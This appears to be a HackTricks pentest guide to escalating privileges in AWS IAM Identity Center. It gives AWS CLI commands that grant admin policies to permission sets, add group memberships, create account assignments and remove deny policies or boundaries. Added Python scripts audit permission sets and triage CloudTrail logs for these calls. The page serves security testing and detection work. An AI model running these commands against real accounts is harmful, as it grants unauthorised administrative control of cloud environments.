AWS - SSO & identitystore Privesc


Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

AWS Identity Center / AWS SSO

For more information about AWS Identity Center / AWS SSO check:

AWS - IAM, Identity Center & SSO Enum

Warning

Note that by default only users with permissions from the Management Account will be able to access and control IAM Identity Center.
Users from other accounts can do so only if the account is a Delegated Administrator.
Check the documentation for more information.

Reset Password

An easy way to escalate privileges in cases like this is to have a permission that allows resetting users' passwords. Unfortunately, it's only possible to send an email to the user so they reset their own password, so you would need access to the user's mailbox.

identitystore:CreateGroupMembership

With this permission it's possible to add a user to a group so they inherit all the permissions the group has.

```bash
aws identitystore create-group-membership --identity-store-id <store-id> --group-id <group-id> --member-id UserId=<user-id>
```

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with these permissions can grant additional permissions to a Permission Set assigned to a user under their control.

```bash
# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.json

# Content of /tmp/policy.json (an IAM policy document, so it must be JSON)
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with these permissions can grant additional permissions to a Permission Set assigned to a user under their control.

```bash
# Attach the AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

An attacker with these permissions can add permissions to a Permission Set assigned to a user under their control.

Warning

To abuse these permissions in this case you need to know the name of a customer managed policy that exists inside all the accounts that will be affected.

```bash
# Attach a customer managed policy (by name) to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```
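The three primitives above all end in the same state: a permission set whose effective policy is administrative. The following audit helper is an added example (not HackTricks or AWS code) that flags such permission sets from a snapshot of their attached managed policies and inline policy. The snapshot layout is an assumption, a list of dicts holding what a collector would gather from `describe-permission-set`, `list-managed-policies-in-permission-set` and `get-inline-policy-for-permission-set`; the sample data is constructed, and the inline policy on "Developer" is the one shown on this page.

```python
"""Audit helper for IAM Identity Center permission sets (added example).

Flags permission sets that are effectively administrative: an inline policy
with an Allow statement over Action "*" and Resource "*", or the AWS managed
AdministratorAccess policy attached. The snapshot format is an assumption;
the sample data below is constructed.
"""
import json

ADMIN_MANAGED_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"


def _as_list(value):
    """IAM allows Statement, Action and Resource to be a string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def inline_policy_grants_admin(policy_json):
    """True if any Allow statement covers every action on every resource."""
    doc = json.loads(policy_json)
    for stmt in _as_list(doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" in _as_list(stmt.get("Action")) and "*" in _as_list(stmt.get("Resource")):
            return True
    return False


def find_admin_permission_sets(snapshot):
    """Return [(name, [reasons])] for permission sets that grant full admin."""
    findings = []
    for ps in snapshot:
        reasons = []
        if ADMIN_MANAGED_POLICY in ps.get("ManagedPolicies", []):
            reasons.append("AdministratorAccess attached")
        inline = ps.get("InlinePolicy")
        if inline and inline_policy_grants_admin(inline):
            reasons.append("inline policy allows * on *")
        if reasons:
            findings.append((ps["Name"], reasons))
    return findings


# Constructed snapshot (hypothetical permission sets, not real data).
SAMPLE_SNAPSHOT = [
    {
        "Name": "ReadOnly",
        "ManagedPolicies": ["arn:aws:iam::aws:policy/ReadOnlyAccess"],
        # single-statement form: Statement is an object, Action a string
        "InlinePolicy": json.dumps({
            "Version": "2012-10-17",
            "Statement": {"Effect": "Allow", "Action": "s3:Get*", "Resource": "*"},
        }),
    },
    {
        "Name": "Developer",
        "ManagedPolicies": ["arn:aws:iam::aws:policy/PowerUserAccess"],
        # the inline policy from this page: full admin
        "InlinePolicy": json.dumps({
            "Version": "2012-10-17",
            "Statement": [{"Sid": "Statement1", "Effect": "Allow",
                           "Action": ["*"], "Resource": ["*"]}],
        }),
    },
    {
        "Name": "Billing",
        "ManagedPolicies": [ADMIN_MANAGED_POLICY],
        "InlinePolicy": None,
    },
]

if __name__ == "__main__":
    for name, reasons in find_admin_permission_sets(SAMPLE_SNAPSHOT):
        print(f"{name}: {', '.join(reasons)}")
```

Run against a real snapshot, the same check doubles as a drift detector: diff its output between two collections and any permission set that newly appears is exactly what the provision step of the commands above produces.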

sso:CreateAccountAssignment

An attacker with this permission can assign a Permission Set in an account to a user under their control.

```bash
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
```

sso:GetRoleCredentials

Returns short-lived STS credentials for a given role name that is assigned to the user.

```bash
aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>
```

However, you need an access token, which I don't know how to obtain (TODO).

sso:DetachManagedPolicyFromPermissionSet

An attacker with this permission can remove the association between an AWS managed policy and the specified permission set. It's possible to gain more privileges by detaching a managed policy that restricts access (a deny policy).

```bash
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
```

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

An attacker with this permission can remove the association between a customer managed policy and the specified permission set. It's possible to gain more privileges by detaching a customer managed policy that restricts access (a deny policy).

```bash
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>
```

sso:DeleteInlinePolicyFromPermissionSet

An attacker with this permission can remove the inline policy from a permission set. It's possible to gain more privileges by deleting an inline policy that restricts access (a deny policy).

```bash
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
```

sso:DeletePermissionBoundaryFromPermissionSet

An attacker with this permission can remove the Permissions Boundary from a permission set. It's possible to gain more privileges by removing the restrictions the Permissions Boundary places on the Permission Set.

```bash
aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
```
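Every primitive on this page, from `identitystore:CreateGroupMembership` through the detach and delete calls above, is a logged API write, and the permission-set ones are only effective once `ProvisionPermissionSet` pushes the change to accounts. The following CloudTrail triage script is an added example (not HackTricks or AWS code): it flags those write actions and reports permission sets that were modified and then provisioned. Assumptions: the `eventSource` values `sso.amazonaws.com` and `identitystore.amazonaws.com` as CloudTrail records them, and the event name `DeletePermissionsBoundaryFromPermissionSet` matching the CLI command above; the log below is a constructed, trimmed-down CloudTrail file with placeholder ARNs and account id.

```python
"""CloudTrail triage for privilege changes in IAM Identity Center (added example).

Flags the sso-admin / identitystore write actions that change who holds which
privileges and, for permission sets, pairs a modification with the
ProvisionPermissionSet call that makes it effective. The eventSource values
are assumed; the log is constructed with placeholder identifiers.
"""
import json
from collections import defaultdict

SENSITIVE_EVENTS = {
    "sso.amazonaws.com": {
        "PutInlinePolicyToPermissionSet",
        "AttachManagedPolicyToPermissionSet",
        "AttachCustomerManagedPolicyReferenceToPermissionSet",
        "CreateAccountAssignment",
        "DetachManagedPolicyFromPermissionSet",
        "DetachCustomerManagedPolicyReferenceFromPermissionSet",
        "DeleteInlinePolicyFromPermissionSet",
        "DeletePermissionsBoundaryFromPermissionSet",
    },
    "identitystore.amazonaws.com": {"CreateGroupMembership"},
}
PROVISION_EVENT = "ProvisionPermissionSet"


def _principal(rec):
    ident = rec.get("userIdentity") or {}
    return ident.get("arn") or ident.get("principalId", "unknown")


def _permission_set(rec):
    return (rec.get("requestParameters") or {}).get("permissionSetArn")


def flag_sensitive_events(records):
    """One finding per successful privilege-changing Identity Center call."""
    findings = []
    for rec in records:
        if rec.get("errorCode"):  # denied calls are not privilege changes
            continue
        if rec.get("eventName") in SENSITIVE_EVENTS.get(rec.get("eventSource"), ()):
            findings.append({
                "time": rec["eventTime"],
                "principal": _principal(rec),
                "event": rec["eventName"],
                "permissionSetArn": _permission_set(rec),
            })
    return findings


def modified_then_provisioned(records):
    """{permissionSetArn: [modifying events]} for sets changed, then provisioned."""
    pending = defaultdict(list)
    confirmed = {}
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        arn = _permission_set(rec)
        if rec.get("errorCode") or not arn or rec.get("eventSource") != "sso.amazonaws.com":
            continue
        name = rec.get("eventName")
        if name in SENSITIVE_EVENTS["sso.amazonaws.com"]:
            pending[arn].append(name)
        elif name == PROVISION_EVENT and pending[arn]:
            confirmed[arn] = list(pending[arn])
    return confirmed


def load_records(log_text):
    """CloudTrail log files are a JSON object with a top-level Records list."""
    return json.loads(log_text)["Records"]


# Constructed sample log: placeholder ARNs, account id and identity store ids.
PS1 = "arn:aws:sso:::permissionSet/ssoins-EXAMPLE/ps-EXAMPLE1"
PS2 = "arn:aws:sso:::permissionSet/ssoins-EXAMPLE/ps-EXAMPLE2"
ACTOR = {"arn": "arn:aws:sts::111111111111:assumed-role/DevRole/alice"}
SAMPLE_LOG = json.dumps({"Records": [
    {"eventTime": "2024-05-01T09:59:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "DetachManagedPolicyFromPermissionSet", "userIdentity": ACTOR,
     "requestParameters": {"permissionSetArn": PS2}},
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "PutInlinePolicyToPermissionSet", "userIdentity": ACTOR,
     "requestParameters": {"permissionSetArn": PS1}},
    {"eventTime": "2024-05-01T10:01:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "ProvisionPermissionSet", "userIdentity": ACTOR,
     "requestParameters": {"permissionSetArn": PS1, "targetType": "ALL_PROVISIONED_ACCOUNTS"}},
    {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "DescribePermissionSet", "userIdentity": ACTOR,  # read-only, ignored
     "requestParameters": {"permissionSetArn": PS1}},
    {"eventTime": "2024-05-01T10:03:00Z", "eventSource": "identitystore.amazonaws.com",
     "eventName": "CreateGroupMembership", "userIdentity": ACTOR,
     "requestParameters": {"groupId": "g-EXAMPLE", "memberId": {"userId": "u-EXAMPLE"}}},
    {"eventTime": "2024-05-01T10:04:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "AttachManagedPolicyToPermissionSet", "userIdentity": ACTOR,
     "errorCode": "AccessDenied", "requestParameters": {"permissionSetArn": PS2}},
]})

if __name__ == "__main__":
    recs = load_records(SAMPLE_LOG)
    for f in flag_sensitive_events(recs):
        print(f"{f['time']} {f['principal']} {f['event']} {f['permissionSetArn']}")
    print("modified then provisioned:", modified_then_provisioned(recs))
```

The detach on `ps-EXAMPLE2` is reported as a finding but not as "modified then provisioned", since no `ProvisionPermissionSet` followed it; the denied attach is dropped entirely. Because Identity Center is administered from the management account (or a delegated administrator), these events should be rare enough that alerting on every one of them is realistic.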
